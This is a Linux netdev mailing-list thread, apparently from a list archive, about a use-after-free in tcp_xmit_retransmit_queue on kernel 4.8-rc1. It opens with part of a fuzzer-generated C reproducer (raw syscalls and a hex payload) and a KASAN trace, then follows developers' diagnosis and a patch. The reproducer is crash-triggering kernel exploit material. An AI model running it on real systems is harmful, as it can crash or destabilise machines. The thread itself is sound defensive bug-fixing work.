xea\x0b\x55\x0b\x71\xfa\x69\xda\x9d\x35\x10\x70\x32\x68\xe8\xde\x47\x74\x1f\xc6\x60\x86\xbd\x15\x1c\x6b\x52\xeb\xe4\x04\x0f\x8c\x70\x2f\x8d\x6d\x7e\x5f\xfd\xe7\xd1\x87\x80\x76\xd8\x7a\x2c\xbf\xb2\x98\x12\x83\x81\
x94\x11\x7d\x1c\x90\xfd\xf0\xdc\xe6\x9d\xee\x76\xde\x50\xcb\x97\x25\xca\x88\xd8\x70\x97\x40\x25\x94\xc5\xfe\x8b\x44\x05\x8d\x6e\x7f\xab\xc3\x27\xd8\x0e\x4a\x30\xb5\xfb\x95\xf8\x34\x75\x01\x1f\xe6\xac\x81\x1b\x13\x63\xb7\x60\xb8\x1c\x3b\xda\x07\x26\x9e\xfd\xeb\x7f\x43\x46\x93\x75\x63\xdc\xa7\xe9\xc1\x8f\xa9\x06\x96\xe7\x10\x87\xb4\x32\x4a\x30\x69\xd2\xf4\x2b\x5d\x76\xa3\x94\x6b\x72\xd9\xc6\xfa\x6a\x49\x12\xc7\xc2\x74\x3f\xc4\x39\x9f\xa0\x7e\xcd\x81\x9c\x54\x0f\x14\xce\xd3\x7e\xd8\xe8\xd2\xc2\x24\x2e\xc5\x1b\x58\xf8\x8e\xe6\xaa\x16\x69\x6c\x4b\x40\x86\x1a\x1a\xad\x11\x6f\x90\x48\x68\x93\xb1\x8f\xbd\xaf\x8d\x00\x09\x5e\xf4\xe3\x03\x59\xff\x8f\xf5\xf0\xe2\xa1\x79\x93\xf5\x76\xcb\x56\x93\xb8\xe6\x22\xe5\x69\x90\x3d\x0f\x9b\x57\x86\x19\xf7\x63\xd5\x2c\xfe\xad\x63\x60\x9e\x9e\x29\x04\xe9\x4d\xb
6\xd9\xb1\xdb\x42\x2d\x8b\x8d\x6d\xdd\xae\x0b\xca\x58\x38\xf4\x30\xad\xae\xa3\x3d\x64\x47\xe0\x77\xc3\xed\xc8\xe0\x7d\x3c\x6c\xda\xbd\x47\x5e\x37\xb4\xe4\xb8\x1c\x69\x16\xb6\xd5\x8b\x9a\x15\xfa\x6b\x21\x88\x74\xbb\xdf\xe3\xbe\x31\x02\x8e\x82\x81\x10\x98\x24\x74\x04\xad\xe3\xc5\x63\x57\x0d\x58\xbe\x1c\x97\xa1\x0d\xb6\x55\x83\x18\x41\x37\xa7\x1b\x51\x37\x13\x99\xeb\x6f\xe3\x70\xc2\x4a\x8c\x17\xc6\x30\x8d\x01\xfe\xd4\x71\x4c\xee\x82\x94\xe4\x1d\x9a\x8a\xed\x48\x61\xba\x6c\x63\x5f\x3b\x13\x9f\x5b\xe4\x0b\x2c\x44\x1c\xb7\xf6\xc7\x64\xf6\x74\x4a\x16\x7a\x35\xf7\x2e\x9d\x4f\x00\x38\xa7\xad\xe7\x17\x0c\xb7\x3f\x02\x41\xe9\xa3\x37\x5b\x98\xd5\x0f\xc6\xe6\xd1\x38\x4e\x87\x4f\x2f\x02\xa1\x27\x4d\xb2\x03\xfc\x50\x48\xaa\x33\x92\xe1\x10\xa6\x0b\xb0\x20\x7c\x57\xd4\x85\x55\x51\x6e\x7e\xdf\xa2\x46\xf5\
x94\x93\x03\x02\xdb\x94\x55\x23\xd9\x5b\x99\x2b\x3a\x7e\x7d\xb1\x80\x47\xf9\x77\xee\x0f\x5e\x63\x7f\x1e\x96\xdf\xf9\x1c\x81\x55\xdd\x02\x81\x87\xc8\x04\x52\x59\x49\xd4\x08\xd5\x73\x43\x3f\xd2\xf9\xa9\xf0\xd7\xb9\x97\x86\x9c\x0a\xc6\x7d\x5a\x98\x88\x2b\x0b\x38\xa1\xcb\xf8\x71\xc7\x5d\xfe\xba\xd0\x26\x4b\xdf\xb8\x11\x8f\x71\x60\x68\xc7\x82\xd0\x36\x97\x23\x56\xda\x52\x58\x90\x0a\x42\x0b\xfc\xf8\xc9\x1f\x36\x7f\x9f\xe5\x5b\xf8\x6e\xe1\x78\x47\xfe\x6b\x00\xcd\xe5\x6b\xe2\xa6\xaf\x2b\x33\x95\x73\x79\x52\x13\x1c\x87\x3d\x8d\xbc\x32\x1e\x11\x25\x91\x51\xa0\xaf\xcc\xf1\xc3\x5a\xea\x8b\x15\x82\x76\xa9\x0f\xe7\x08\x73\x53\x02\x4c\x8c\xb2\x8d\x4b\xa0\xed\x37\x20\x7f\x54\xa2\x2a\x33\x6b\x5f\x3a\x4f\x54\x61\x85\x91\x86\x68\x5a\xd4\x80\xc9\x21\xa9\x16\x5d\x77\xee\x28\xeb\xc2\x5c\x22\xe4\x27\xdb\x5b\xe
4\xa7\x70\xdc\x6a\x8e\xd9\xe7\x77\x09\x5b\x94\x97\xc6\xf4\x1f\x7a\x35\x9e\x26\x1e\x8b\x37\xe3\xa4\xdc\x0a\x8a\x19\x59\x3a\x77\x81\x2d\x9b\x0e\x51\x2b\xd7\xc5\xbc\x07\xfa\xf3\x29\x79\x35\x98\xe3\xb8\xf7\xe5\x40\xdf\xa8\x93\x00\xf6\x53\x8c\xcc\x33\xdf\x0e\x35\x3e\x72\x8d\x48\x85\x05\x40\x43\xe1\x13\xd6\x4a\x95\x50\xf8\x32\xca\xc3\x1c\x28\xd4\x41\x15\x64\xc1\x08\xfb\x2c\xc2\x1f\x79\x30\x58\xaa\x7c\x0d\x83\x8e\x87\xf4\x2e\xa3\xfc\xeb\xd0\xdb\xcc\x15\xcd\x88\x99\x41\x75\x13\xc1\x0c\x53\x96\xfe\xff\xeb\x87\x6a\x04\x75\xf2\x98\x40\x7e\xc7\x4e\x47\x63\x31\x2f\xb2\xa2\x88\x30\xca\x49\xfb\x57\x40\x65\x8c\xc9\x80\x20\xb9\xc9\xfc\x79\x12\x8d\xe6\x24\x24\x5f\x38\x47\x3c\x93\x64\x41\x9a\xf2\xe8\xab\xc1\xaf\x13\x95\x5c\x26\x4e\x02\x99\x5f\x6a\xe3\xd4\x91\x0a\xf5\x06\x3a\x2d\xc9\x22\x96\x6b\xa0\x77\x00\
x77\x7c\x26\xdc\xb6\xc1\x1b\x6c\xc8\xfe\x43\x2c\xe2\xdc\x58\x7e\x30\x38\x98\x97\xdf\xda\xae\x9d\x40\x94\xb7\x16\x91\x66\x94\x6c\x2a\x50\x39\x69\xce\xb4\x5c\xec\x2e\x60\x71\x92\xa3\x14\x1f\x08\x70\xcb\x9c\x47\x5b\xf3\xf4\xea\x7a\x34\x43\x32\x8b\x19\x57\xd2\xe7\x1c\xc5\xeb\xa5\x66\x37\x73\x80\x59\xac\x1e\xc0\x2f\xf1\x30\xf4\xd0\xc7\x78\x2b\x38\xd3\xab\x74\xfd\x4d\xdf\x5e\xc5\xa7\x89\x1b\xb7\x76\xf5\xf9\xfd\xca\xfc\xc2\x0d",
4096);
r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul,
0x0ul);
r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
*(uint32_t*)0x20022fdd = (uint32_t)0x28;
*(uint32_t*)0x20022fe1 = (uint32_t)0x400;
*(uint64_t*)0x20022fe5 = (uint64_t)0x0;
*(uint64_t*)0x20022fed = (uint64_t)0x8ab;
*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
*(uint16_t*)0x20022ffd = (uint16_t)0x5;
r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
} else if (pid > 0) {
int returnStatus;
waitpid(pid, &returnStatus, 0);
printf("collected child\n");
} else {
printf("fork failed\n");
exit(1);
}
}
return 0;
}
// KASAN report on v4.8-rc1, equivalent on master
/*
[ 21.446876] BUG: KASAN: use-after-free in
tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[ 21.447953] Read of size 4 by task rsyslogd/1612
[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B
4.8.0-rc1 #1
[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268
ffffffff81bef151
[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8
ffff88007a06d400
[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328
ffff88007a06d400
[ 21.452873] Call Trace:
[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2
[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[ 21.484295] [<ffffffff810fddf1>] ?
__x2apic_send_IPI_dest.constprop.4+0x31/0x40
[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140
[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[ 21.493378] <EOI> Object at ffff88007a06d400, in cache
skbuff_fclone_cache size: 424
[ 21.494277] Allocated:
[ 21.494538] PID = 1711
[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 21.504144] Freed:
[ 21.504368] PID = 1711
[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 21.513258] Memory state around the buggy address:
[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00
[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc
fc fc
[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[ 21.516114] ^
[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
[ 21.518203]
==================================================================
*/
----- End forwarded message -----
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 10:45 Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master] Greg KH
@ 2016-08-16 15:39 ` Eric Dumazet
2016-08-16 18:39 ` Eric Dumazet
0 siblings, 1 reply; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 15:39 UTC (permalink / raw)
To: Greg KH; +Cc: netdev, Marco Grassi
On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> For some reason Marco's emails can't make it to netdev, so I'm
> forwarding this on. Please cc: him on responses.
Thanks for the report Greg and Marco.
My first guess is this is caused by
d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
And a combination of funky sendmsg() flags (like FastOpen)
I will look at this problem today.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 15:39 ` Eric Dumazet
@ 2016-08-16 18:39 ` Eric Dumazet
2016-08-16 20:19 ` Cong Wang
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
0 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 18:39 UTC (permalink / raw)
To: Greg KH; +Cc: netdev, Marco Grassi, Yuchung Cheng, Neal Cardwell
On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> > For some reason Marco's emails can't make it to netdev, so I'm
> > forwarding this on. Please cc: him on responses.
>
> Thanks for the report Greg and Marco.
>
> My first guess is this is caused by
>
> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
>
> And a combination of funky sendmsg() flags (like FastOpen)
>
> I will look at this problem today.
>
No, above commit was innocent ;)
It looks like the bug is very old, and following patch would fix it.
I will submit it formally after few tests.
diff --git a/include/net/tcp.h b/include/net/tcp.h
index c00e7d51bb18..7717302cab91 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
{
if (sk->sk_send_head == skb_unlinked)
sk->sk_send_head = NULL;
+ if (tcp_sk(sk)->highest_sack == skb_unlinked)
+ tcp_sk(sk)->highest_sack = NULL;
}
static inline void tcp_init_send_head(struct sock *sk)
^ permalink raw reply related [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 18:39 ` Eric Dumazet
@ 2016-08-16 20:19 ` Cong Wang
2016-08-16 20:27 ` Eric Dumazet
2016-08-17 12:56 ` [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue() Eric Dumazet
1 sibling, 1 reply; 12+ messages in thread
From: Cong Wang @ 2016-08-16 20:19 UTC (permalink / raw)
To: Eric Dumazet
Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
Yuchung Cheng, Neal Cardwell
On Tue, Aug 16, 2016 at 11:39 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
>> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
>> > For some reason Marco's emails can't make it to netdev, so I'm
>> > forwarding this on. Please cc: him on responses.
>>
>> Thanks for the report Greg and Marco.
>>
>> My first guess is this is caused by
>>
>> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
>>
>> And a combination of funky sendmsg() flags (like FastOpen)
>>
>> I will look at this problem today.
>>
>
> No, above commit was innocent ;)
>
> It looks like the bug is very old, and following patch would fix it.
> I will submit it formally after few tests.
>
>
> diff --git a/include/net/tcp.h b/include/net/tcp.h
> index c00e7d51bb18..7717302cab91 100644
> --- a/include/net/tcp.h
> +++ b/include/net/tcp.h
> @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
> {
> if (sk->sk_send_head == skb_unlinked)
> sk->sk_send_head = NULL;
> + if (tcp_sk(sk)->highest_sack == skb_unlinked)
> + tcp_sk(sk)->highest_sack = NULL;
> }
Hmm, but from the stack traces it indicates the skb is freed
inside tcp_sendmsg(), which must be:
do_fault:
if (!skb->len) {
tcp_unlink_write_queue(skb, sk);
/* It is the one place in all of TCP, except connection
* reset, where we can be unlinking the send_head.
*/
tcp_check_send_head(sk, skb);
sk_wmem_free_skb(sk, skb);
}
In this case, skb->len == 0 means it is newly allocated skb by
sk_stream_alloc_skb(), so it should not have a chance to be
picked by tp->highest_sack yet b/c the whole function locks
the sock?
I must miss something here.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 20:19 ` Cong Wang
@ 2016-08-16 20:27 ` Eric Dumazet
2016-08-16 20:31 ` Eric Dumazet
2016-08-16 20:32 ` Cong Wang
0 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 20:27 UTC (permalink / raw)
To: Cong Wang
Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
Yuchung Cheng, Neal Cardwell
On Tue, 2016-08-16 at 13:19 -0700, Cong Wang wrote:
> On Tue, Aug 16, 2016 at 11:39 AM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> > On Tue, 2016-08-16 at 08:39 -0700, Eric Dumazet wrote:
> >> On Tue, 2016-08-16 at 12:45 +0200, Greg KH wrote:
> >> > For some reason Marco's emails can't make it to netdev, so I'm
> >> > forwarding this on. Please cc: him on responses.
> >>
> >> Thanks for the report Greg and Marco.
> >>
> >> My first guess is this is caused by
> >>
> >> d41a69f1d390 tcp: make tcp_sendmsg() aware of socket backlog
> >>
> >> And a combination of funky sendmsg() flags (like FastOpen)
> >>
> >> I will look at this problem today.
> >>
> >
> > No, above commit was innocent ;)
> >
> > It looks like the bug is very old, and following patch would fix it.
> > I will submit it formally after few tests.
> >
> >
> > diff --git a/include/net/tcp.h b/include/net/tcp.h
> > index c00e7d51bb18..7717302cab91 100644
> > --- a/include/net/tcp.h
> > +++ b/include/net/tcp.h
> > @@ -1523,6 +1523,8 @@ static inline void tcp_check_send_head(struct sock *sk, struct sk_buff *skb_unli
> > {
> > if (sk->sk_send_head == skb_unlinked)
> > sk->sk_send_head = NULL;
> > + if (tcp_sk(sk)->highest_sack == skb_unlinked)
> > + tcp_sk(sk)->highest_sack = NULL;
> > }
>
> Hmm, but from the stack traces it indicates the skb is freed
> inside tcp_sendmsg(), which must be:
>
>
> do_fault:
> if (!skb->len) {
> tcp_unlink_write_queue(skb, sk);
> /* It is the one place in all of TCP, except connection
> * reset, where we can be unlinking the send_head.
> */
> tcp_check_send_head(sk, skb);
> sk_wmem_free_skb(sk, skb);
> }
>
> In this case, skb->len == 0 means it is newly allocated skb by
> sk_stream_alloc_skb(), so it should not have a chance to be
> picked by tp->highest_sack yet b/c the whole function locks
> the sock?
>
> I must miss something here.
Look at skb_entail() : It calls tcp_add_write_queue_tail()
And tcp_add_write_queue_tail() looks like :
static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
{
__tcp_add_write_queue_tail(sk, skb);
/* Queue it, remembering where we must start sending. */
if (sk->sk_send_head == NULL) {
sk->sk_send_head = skb;
if (tcp_sk(sk)->highest_sack == NULL)
tcp_sk(sk)->highest_sack = skb;
}
}
So we definitely need to undo what tcp_add_write_queue_tail() did.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 20:27 ` Eric Dumazet
@ 2016-08-16 20:31 ` Eric Dumazet
2016-08-16 20:32 ` Cong Wang
1 sibling, 0 replies; 12+ messages in thread
From: Eric Dumazet @ 2016-08-16 20:31 UTC (permalink / raw)
To: Cong Wang
Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
Yuchung Cheng, Neal Cardwell
On Tue, 2016-08-16 at 13:27 -0700, Eric Dumazet wrote:
>
> Look at skb_entail() : It calls tcp_add_write_queue_tail()
>
> And tcp_add_write_queue_tail() looks like :
>
>
> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
> {
> __tcp_add_write_queue_tail(sk, skb);
>
> /* Queue it, remembering where we must start sending. */
> if (sk->sk_send_head == NULL) {
> sk->sk_send_head = skb;
>
> if (tcp_sk(sk)->highest_sack == NULL)
> tcp_sk(sk)->highest_sack = skb;
> }
> }
>
>
> So we definitely need to undo what tcp_add_write_queue_tail() did.
So the bug was probably added in 2.6.25
commit 6859d49475d4f32abe640372117e4b687906e6b6
Author: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Date: Sun Dec 2 00:48:06 2007 +0200
[TCP]: Abstract tp->highest_sack accessing & point to next skb
Pointing to the next skb is necessary to avoid referencing
already SACKed skbs which will soon be on a separate list.
Signed-off-by: Ilpo Järvinen <ilpo.jarvinen@helsinki.fi>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 20:27 ` Eric Dumazet
2016-08-16 20:31 ` Eric Dumazet
@ 2016-08-16 20:32 ` Cong Wang
2016-08-17 11:10 ` Marco Grassi
1 sibling, 1 reply; 12+ messages in thread
From: Cong Wang @ 2016-08-16 20:32 UTC (permalink / raw)
To: Eric Dumazet
Cc: Greg KH, Linux Kernel Network Developers, Marco Grassi,
Yuchung Cheng, Neal Cardwell
On Tue, Aug 16, 2016 at 1:27 PM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> And tcp_add_write_queue_tail() looks like :
>
>
> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
> {
> __tcp_add_write_queue_tail(sk, skb);
>
> /* Queue it, remembering where we must start sending. */
> if (sk->sk_send_head == NULL) {
> sk->sk_send_head = skb;
>
> if (tcp_sk(sk)->highest_sack == NULL)
> tcp_sk(sk)->highest_sack = skb;
> }
> }
>
Ah, I never looked into tcp_add_write_queue_tail()...
So this bug seems exist after commit 6859d49475d4f32abe640372117e4b...
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
2016-08-16 20:32 ` Cong Wang
@ 2016-08-17 11:10 ` Marco Grassi
0 siblings, 0 replies; 12+ messages in thread
From: Marco Grassi @ 2016-08-17 11:10 UTC (permalink / raw)
To: Cong Wang
Cc: Eric Dumazet, Greg KH, Linux Kernel Network Developers,
Yuchung Cheng, Neal Cardwell
Hello, I'm fuzzing with your patch applied, and I don't see the issue
triggering anymore, (or other related)
I will keep you updated if something pops up, so we can fix before pushing
Marco
On Wed, Aug 17, 2016 at 4:32 AM, Cong Wang <xiyou.wangcong@gmail.com> wrote:
> On Tue, Aug 16, 2016 at 1:27 PM, Eric Dumazet <eric.dumazet@gmail.com> wrote:
>> And tcp_add_write_queue_tail() looks like :
>>
>>
>> static inline void tcp_add_write_queue_tail(struct sock *sk, struct sk_buff *skb)
>> {
>> __tcp_add_write_queue_tail(sk, skb);
>>
>> /* Queue it, remembering where we must start sending. */
>> if (sk->sk_send_head == NULL) {
>> sk->sk_send_head = skb;
>>
>> if (tcp_sk(sk)->highest_sack == NULL)
>> tcp_sk(sk)->highest_sack = skb;
>> }
>> }
>>
>
> Ah, I never looked into tcp_add_write_queue_tail()...
>
> So this bug seems exist after commit 6859d49475d4f32abe640372117e4b...
^ permalink raw reply [flat|nested] 12+ messages in thread
* [PATCH net] tcp: fix use after free in tcp_xmit_retransmit_queue()
2016-08-16 18:39 ` Eric Dumazet
2016-08-16 20:19 ` Cong Wang
@ 2016-08-17 12:56 ` Eric Dumazet
2016-08-17 14:09 ` Neal Cardwell
` (2 more replies)
1 sibling, 3 replies; 12+ messages in thread
From: Eric Dumazet @ 2016-08-17 12:56 UTC (permalink / raw)
To: David Miller
Cc: netdev, Marco Grassi, Yuchung Cheng, Neal Cardwell, Greg KH,
Ilpo Järvinen
From: Eric Dumazet <edumazet@google.com>
When tcp_sendmsg() allocates a fresh and empty skb, it puts it at the
tail of the write queue using tcp_add_write_queue_tail()
Then it attempts to copy user data into this fresh skb.
If the copy fails, we undo the work and remove the fresh skb.
Unfortunately, this undo lacks the change done to tp->highest_sack and
we can leave a dangling pointer (to a freed skb)
Later, tcp_xmit_retransmit_queue() can dereference this pointer and
access freed memory. For regular kernels where memory is not unmapped,
this might cause SACK bugs because tcp_highest_sack_seq() is buggy,
returning garbage instead of tp->snd_nxt, but with various debug
features like CONFIG_DEBUG_PAGEALLOC, this can crash the kernel.
This bug was found by Marco Grassi thanks to syzkaller.
Fixes: 6859d49475d4 ("[TCP]: Abstract tp->highest_sack accessing & point to next skb")
Reported-by: Marco Grassi <marco.gra@gmail.com>
